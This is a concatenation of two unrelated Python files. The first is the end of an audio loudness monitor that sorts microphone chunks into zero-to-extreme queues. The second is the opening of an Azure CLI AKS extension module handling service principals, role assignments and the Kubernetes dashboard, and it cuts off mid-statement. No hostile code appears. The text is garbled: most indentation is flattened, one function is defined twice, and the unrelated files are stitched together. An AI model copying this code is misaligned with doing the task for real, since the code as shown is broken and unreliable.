def AudioMonitorProcess(MeasureSoundQueue):
""" Watch audio stream, get chunk.
('chunk' means a group of individual audio samples/frames)
Put chunk in MeasureSoundQueue. """
# Calculate chunk length based on settings
CHUNK_LENGTH = int(RATE * record_time)
# Open audio input stream with PyAudio
print("Opening audio stream...")
audio = pyaudio.PyAudio()
stream = audio.open(format=pyaudio.paInt16, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK_LENGTH)
# Capture stream
# docs: read(num_frames, exception_on_overflow=True)
while True:
# Add try/except here!
queue_put(MeasureSoundQueue, stream.read(CHUNK_LENGTH, exception_on_overflow=True))
# ========================
# Measure Sound Process
# ========================
# Store .attributes as strings!
def MeasureSoundProcess(MeasureSoundQueue, RateSoundQueue):
""" Get RMS of chunk, convert RMS to dB.
Create Sound object with .dB and .RMS.
Put Sound object in RateSoundQueue. """
y = Sound()
y.visual_string = ""
while True:
x = Sound()
a = queue_get(MeasureSoundQueue)
if x != y:
x.raw_RMS = Decimal(audioop.rms(a, 2)) # 2 refers to bit depth of audio stream IN BYTES
x.raw_dB = Decimal('20') * x.raw_RMS.log10()
# How many bars to display?
try:
visuals_count = (x.raw_dB * Decimal('0.1'))**Decimal('2')
x.visual_string = "|" * int(visuals_count)
except (InvalidOperation, OverflowError) as e:
x.visual_string = y.visual_string
# See class Sound() for info on attrs
skip = False
try:
x.RMS = str(x.raw_RMS.quantize(RMS_rounder)).zfill(5)
x.dB = str(x.raw_dB.quantize(dB_rounder)).zfill(4)
except InvalidOperation:
skip = True
if not skip: queue_put(RateSoundQueue, x)
y = x
# ========================
# Rate Sound Process
# ========================
def RateSoundProcess(RateSoundQueue, ZeroQueue, AmbientQueue, QuietQueue, ModerateQueue, LoudQueue, ExtremeQueue):
""" Take Sound object from RateSoundQueue.
Assign Sound object to queue based on rating:
[zero, ambient, quiet, moderate, loud, extreme]
Put object in correct queue based on loudness rating. """
# -Infinity to next are zero
AmbientLevel = Decimal('0.05') # Here to next are ambient
QuietLevel = Decimal('30.0') # Here to next are quiet
ModerateLevel = Decimal('45.0') # Here to next are moderate
LoudLevel = Decimal('75.0') # Here to next are loud
ExtremeLevel = Decimal('82.0') # Here and up are extreme
y = None
while True:
x = queue_get(RateSoundQueue)
if x != y:
if x.raw_dB < AmbientLevel: queue_put(ZeroQueue, x)
if x.raw_dB >= AmbientLevel and x.raw_dB < QuietLevel: queue_put(AmbientQueue, x)
if x.raw_dB >= QuietLevel and x.raw_dB < ModerateLevel: queue_put(QuietQueue, x)
if x.raw_dB >= ModerateLevel and x.raw_dB < LoudLevel: queue_put(ModerateQueue, x)
if x.raw_dB >= LoudLevel and x.raw_dB < ExtremeLevel: queue_put(LoudQueue, x)
if x.raw_dB >= ExtremeLevel: queue_put(ExtremeQueue, x)
y = x
# ========================
# Sound Handler Processes
# ========================
def ZeroSoundHandlerProcess(ZeroQueue):
""" Display text based on recieved Sound object """
y = Sound() # Dummy Sound object, see bottom of loop
y.dB = ""
while True:
x = queue_get(ZeroQueue)
if x is not None and x.dB != y.dB:
# If we got a sound and it's not the same
# volume as the last sound
print(prefix() + x.RMS + " RMS - " + x.dB + " dB - Zero - " + x.visual_string)
y = x
def AmbientSoundHandlerProcess(AmbientQueue):
""" Display text based on recieved Sound object """
y = Sound() # Dummy Sound object, see bottom of loop
y.dB = ""
while True:
x = queue_get(AmbientQueue)
if x is not None and x.dB != y.dB:
# If we got a sound and it's not the same
# volume as the last sound
print(prefix() + x.RMS + " RMS - " + x.dB + " dB - Ambient - " + x.visual_string)
y = x
def QuietSoundHandlerProcess(QuietQueue):
""" Display text based on recieved Sound object """
y = Sound() # Dummy Sound object, see bottom of loop
y.dB = ""
while True:
x = queue_get(QuietQueue)
if x is not None and x.dB != y.dB:
# If we got a sound and it's not the same
# volume as the last sound
print(prefix() + x.RMS + " RMS - " + x.dB + " dB - Quiet - " + x.visual_string)
y = x
def ModerateSoundHandlerProcess(ModerateQueue):
""" Display text based on recieved Sound object """
y = Sound() # Dummy Sound object, see bottom of loop
y.dB = ""
while True:
x = queue_get(ModerateQueue)
if x is not None and x.dB != y.dB:
# If we got a sound and it's not the same
# volume as the last sound
print(prefix() + x.RMS + " RMS - " + x.dB + " dB - Moderate - " + x.visual_string)
y = x
def LoudSoundHandlerProcess(LoudQueue):
""" Display text based on recieved Sound object """
y = Sound() # Dummy Sound object, see bottom of loop
y.dB = ""
while True:
x = queue_get(LoudQueue)
if x is not None and x.dB != y.dB:
# If we got a sound and it's not the same
# volume as the last sound
print(prefix() + x.RMS + " RMS - " + x.dB + " dB - Loud - " + x.visual_string)
y = x
def ExtremeSoundHandlerProcess(ExtremeQueue):
""" Display text based on recieved Sound object """
y = Sound() # Dummy Sound object, see bottom of loop
y.dB = ""
while True:
x = queue_get(ExtremeQueue)
if x is not None and x.dB != y.dB:
# If we got a sound and it's not the same
# volume as the last sound
print(prefix() + x.RMS + " RMS - " + x.dB + " dB - Extreme - " + x.visual_string)
y = x
# Audio Monitor Process --> Measure Sound Process --> Rate Sound Process --> Sound Handler Process
def main():
print("Please read my docs! :)")
# Create Queues
print("Creating queues...")
MeasureSoundQueue = mp.Queue()
RateSoundQueue = mp.Queue()
ZeroQueue = mp.Queue()
AmbientQueue = mp.Queue()
QuietQueue = mp.Queue()
ModerateQueue = mp.Queue()
LoudQueue = mp.Queue()
ExtremeQueue = mp.Queue()
# Create process objects
print("Creating process objects...")
AudioMonitorProcessObj = mp.Process(target=AudioMonitorProcess, args=(MeasureSoundQueue,), name="Audio Monitor Process")
MeasureSoundProcessObj = mp.Process(target=MeasureSoundProcess, args=(MeasureSoundQueue, RateSoundQueue,), name="Measure Sound Process")
RateSoundProcessObj = mp.Process(target=RateSoundProcess, args=(RateSoundQueue, ZeroQueue, AmbientQueue, QuietQueue, ModerateQueue, LoudQueue, ExtremeQueue), name="Rate Sound Process")
ZeroSoundHandlerProcessObj = mp.Process(target=ZeroSoundHandlerProcess, args=(ZeroQueue,), name="Zero Sound Handler Process")
AmbientSoundHandlerProcessObj = mp.Process(target=AmbientSoundHandlerProcess, args=(AmbientQueue,), name="Ambient Sound Handler Process")
QuietSoundHandlerProcessObj = mp.Process(target=QuietSoundHandlerProcess, args=(QuietQueue,), name="Quiet Sound Handler Process")
ModerateSoundHandlerProcessObj = mp.Process(target=ModerateSoundHandlerProcess, args=(ModerateQueue,), name="Moderate Sound Handler Process")
LoudSoundHandlerProcessObj = mp.Process(target=LoudSoundHandlerProcess, args=(LoudQueue,), name="Loud Sound Handler Process")
ExtremeSoundHandlerProcessObj = mp.Process(target=ExtremeSoundHandlerProcess, args=(ExtremeQueue,), name="Extreme Sound Handler Process")
# Start processes in order
print("Starting processes...")
AudioMonitorProcessObj.start()
MeasureSoundProcessObj.start()
RateSoundProcessObj.start()
ZeroSoundHandlerProcessObj.start()
AmbientSoundHandlerProcessObj.start()
QuietSoundHandlerProcessObj.start()
ModerateSoundHandlerProcessObj.start()
LoudSoundHandlerProcessObj.start()
ExtremeSoundHandlerProcessObj.start()
if __name__ == '__main__':
main()
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import get_file_json, in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core._profile import Profile
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2021_03_01.models import (ContainerServiceLinuxProfile,
ManagedClusterWindowsProfile,
ContainerServiceNetworkProfile,
ManagedClusterServicePrincipalProfile,
ContainerServiceSshConfiguration,
MaintenanceConfiguration,
TimeInWeek,
TimeSpan,
ContainerServiceSshPublicKey,
ManagedCluster,
ManagedClusterAADProfile,
ManagedClusterAddonProfile,
ManagedClusterAgentPoolProfile,
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
ManagedClusterIdentity,
ManagedClusterAPIServerAccessProfile,
ManagedClusterSKU,
ManagedClusterIdentityUserAssignedIdentitiesValue,
ManagedClusterAutoUpgradeProfile,
KubeletConfig,
LinuxOSConfig,
SysctlConfig,
ManagedClusterPodIdentityProfile,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
UserAssignedIdentity,
RunCommandRequest,
ManagedClusterPropertiesIdentityProfileValue)
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import get_msi_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._client_factory import cf_agent_pools
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME, CONST_SECRET_ROTATION_ENABLED
from ._consts import CONST_AZURE_DEFENDER_ADDON_NAME, CONST_AZURE_DEFENDER_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
from ._consts import ADDONS
from .maintenanceconfiguration import aks_maintenanceconfiguration_update_internal
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM, CONST_PRIVATE_DNS_ZONE_NONE
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
            break  # URL is reachable; stop waiting
        except URLError:
            time.sleep(1)
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
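# The prefix is therefore: the first 10 alphanumeric/dash characters of the cluster name
# (prefixed with 'a' if it does not start with a letter), the first 16 of the resource
# group name, and the first 6 characters of the subscription id, joined by dashes.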
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
else:
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
# XXX: if role is uuid, this function's output cannot be used as role assignment defintion id
# ref: https://github.com/Azure/azure-cli/issues/2458
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(
cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
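# The resulting scope is either the bare subscription ('/subscriptions/<id>'), a resource
# group ('/subscriptions/<id>/resourceGroups/<name>'), or whatever explicit scope the
# caller supplied.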
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).principal_id
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
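# Minimal example of the shallow merge in _update_dict above (values are illustrative only):
#   _update_dict({'a': 1, 'b': 2}, {'b': 3})  -> {'a': 1, 'b': 3}
# dict2 wins on key collisions and dict1 is left unmodified.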
def aks_browse(cmd, # pylint: disable=too-many-statements,too-many-branches
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return
# otherwise open the kube-dashboard addon
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
